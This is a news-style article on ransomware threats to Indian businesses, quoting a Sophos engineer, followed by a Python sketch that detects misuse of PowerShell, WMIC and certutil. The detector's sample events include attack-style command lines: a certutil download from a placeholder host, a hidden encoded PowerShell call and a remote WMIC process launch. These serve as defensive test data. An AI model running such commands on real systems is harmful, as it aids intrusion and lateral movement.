Criminal gangs have been using ransomware to attack businesses for over three decades. The first recorded attack was against a hospital and was executed by distributing infected floppy disks. Today, email is the main attack vector, with ransomware families such as DoppelPaymer, REvil, Clop, DarkSide, Netwalker, Ragnar Locker and Conti able to encrypt data and, in some cases, exfiltrate that data first.

The goal here is always the same. The criminals executing these attacks are motivated by money. They want you to either pay for decryption keys to retrieve your data – two-thirds of the companies hit with ransomware in India paid the ransom last year, according to the recent Sophos State of Ransomware report – or pay to prevent stolen data from being made public.

The problem is not going away. Data from India’s National Crime Records Bureau reveals that the number of attacks doubled between 2018 and 2019, with no sign of relenting. According to Sophos’ data, 82% of businesses were hit with ransomware attacks in 2020. It doesn’t matter whether the business is large or small – everyone is a potential target.

Aaron Bugal, the Global Solutions Engineer at Sophos, says, “Ransomware doesn’t discriminate – every organisation is a target, regardless of size, sector, or geography. And the ransom amounts are not fixed. Attackers vary them based on what they believe the victim can pay.”

The group behind the WastedLocker ransomware, for example, analysed its targets and set ransoms according to the size and scale of the organisation. While some received demands for US$500,000, others faced a whopping US$10M to regain access to their data.

“The take-away here is that the ransom demands businesses are receiving are most likely attributed to information the attacker has been able to steal, analyse and use to evaluate your target worth,” says Mr Bugal.

But not all attackers are looking for huge paydays using sophisticated tools.

“At the other end of the scale is your more fast-food variety of ransomware such as Dharma, which forms the basis of ransomware-as-a-service operations,” says Mr Bugal. “Less sophisticated cybercriminal outfits can purchase malware on the dark web and go after small- to medium-sized businesses. Ransom demands using Dharma average around US$8,000, which is still considerable for many smaller organisations.”

The most common attack vector used by ransomware gangs is email. In order to craft an email with the greatest chance of tricking someone into opening a malicious attachment, clicking a link to a malware-laden website or providing log-in credentials, the criminals use public sources of information such as search engines, social media, open-source intelligence tools and previously exposed data dumps to determine an easy method to break into an environment.

“Once they’re inside, the attackers use native tools like PowerShell, Windows Management Instrumentation Command-line (WMIC), Certutil and others to maintain persistence, elevate privileges and laterally move onto other internal systems. Once they’ve got the lay of the land, they get a little more brazen and start stealing corporate information and turning to the use of more aggressive and destructive tools.”

Minimising the risk of an attack requires both a proactive and a reactive strategy.

“Employing proactive security with 24/7 monitoring with automated software and threat hunting experts is key to quickly and effectively identifying, investigating, and mitigating anomalous behaviour,” says Mr Bugal. “Services such as Sophos Managed Threat Response combine the best tools with the most experienced threat hunters to help identify and neutralise active threats, limit recurrence, and minimise the chance of ransomware taking hold of your business assets.”

This needs to be supported by staff education so your people can identify suspicious emails and applications and report them quickly and easily.

If an attacker manages to bypass the proactive controls you have in place, then you need to contain and neutralise the attack. Once you have stopped the spread, assess the damage.

“Assess what data has been lost, which endpoints, servers and operating systems were affected and whether your backups are still intact or if the attacker has deleted them. If they are intact, make an offline copy immediately. And look for machines that were protected, as they’ll be critical in getting you back on your feet,” says Mr Bugal.

You may also need to engage a third party, such as Sophos Rapid Response, for specialist incident response to neutralise an active attack and conduct post-incident analysis to assess what happened and help you mitigate future attacks.

Ransomware costs Indian businesses millions of dollars and causes massive business disruption. By taking proactive and reactive steps, it’s possible to break the criminals’ business cycle. By making it harder for them to receive the financial rewards they crave, you can protect your business and remove the incentive for them to attack.
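The article notes that once inside, attackers lean on built-in Windows tools such as PowerShell, WMIC and Certutil rather than bringing their own malware, which is exactly where the "24/7 monitoring" it recommends has to look. The following detection sketch is an added example (not Sophos code and not from the article): it scans process-creation events for the telltale ways those three tools get misused. The event field names and every sample event are constructed assumptions, and the base64 value encodes nothing more than "Get-Date".

```python
"""Flag suspicious use of the native Windows tools named in the article (PowerShell,
WMIC, certutil) in process-creation events. The event layout and all sample events
are constructed for this example, not taken from any product."""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "host user rule reason")

# Each rule: name, regex over "image + command line", and why it matters to a defender.
RULES = [
    ("powershell_encoded", re.compile(r"powershell.*\s-(?:e|en|enc|encodedcommand)\s", re.I),
     "encoded PowerShell command line hides the script from casual review"),
    ("powershell_download", re.compile(r"powershell.*(?:downloadstring|downloadfile|invoke-webrequest|iwr\b)", re.I),
     "PowerShell fetching content from the network"),
    ("wmic_remote_exec", re.compile(r"wmic.*/node:.*process\s+call\s+create", re.I),
     "WMIC starting a process on another host (lateral movement)"),
    ("certutil_download", re.compile(r"certutil.*-urlcache", re.I),
     "certutil used as a downloader"),
    ("certutil_decode", re.compile(r"certutil.*-decode", re.I),
     "certutil decoding a base64 blob to disk"),
]

def scan_events(events):
    """Return one Finding per (event, rule) match, in input order.
    events: iterable of dicts with host, user, image and cmdline keys."""
    findings = []
    for ev in events:
        text = f"{ev['image']} {ev['cmdline']}"
        for name, pattern, reason in RULES:
            if pattern.search(text):
                findings.append(Finding(ev["host"], ev["user"], name, reason))
    return findings

# Constructed sample events: two routine admin commands, three that warrant a look.
# The -enc value is the UTF-16LE base64 of "Get-Date", i.e. a harmless command.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
SAMPLE_EVENTS = [
    {"host": "fin-ws01", "user": "CORP\\alice", "image": PS,
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},
    {"host": "fin-ws01", "user": "CORP\\alice", "image": PS,
     "cmdline": "powershell.exe -nop -w hidden -enc RwBlAHQALQBEAGEAdABlAA=="},
    {"host": "fin-ws01", "user": "CORP\\alice", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/update.txt update.txt"},
    {"host": "fin-ws02", "user": "CORP\\svc-backup", "image": WMIC,
     "cmdline": 'wmic.exe /node:fin-srv03 process call create "cmd.exe /c whoami"'},
    {"host": "fin-ws02", "user": "CORP\\svc-backup", "image": WMIC,
     "cmdline": "wmic.exe os get caption"},
]
```

Running `scan_events(SAMPLE_EVENTS)` returns three findings (encoded PowerShell, certutil download, remote WMIC process creation) and leaves the two routine commands alone; in practice such rules feed an alert queue for the human threat hunters the article describes rather than blocking on their own.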